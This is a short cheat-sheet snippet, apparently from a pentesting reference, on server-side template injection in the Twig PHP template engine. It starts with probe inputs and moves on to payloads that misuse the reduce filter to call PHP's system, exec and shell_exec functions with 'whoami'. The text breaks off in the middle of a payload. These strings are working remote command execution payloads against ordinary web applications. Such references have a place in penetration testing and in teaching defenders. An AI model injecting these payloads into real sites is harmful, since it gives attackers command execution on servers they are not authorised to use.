-
Twig is a MVC-based template engine for PHP. Documentation Output a value: {{ var }} Force a error, e.g. via a invalid operation: {{'a' * 5}} Concatanation of strings: {{ 'a' ~ 'a' }} The reduce method take a function and then parameters… (It’s a PHP template engine, remember?) {{ [0]|reduce('system','whoami')}}{{ [0]|reduce('exec', 'whoami') }}{{ [0]|reduce('shell_exec', 'whoami') }}{{…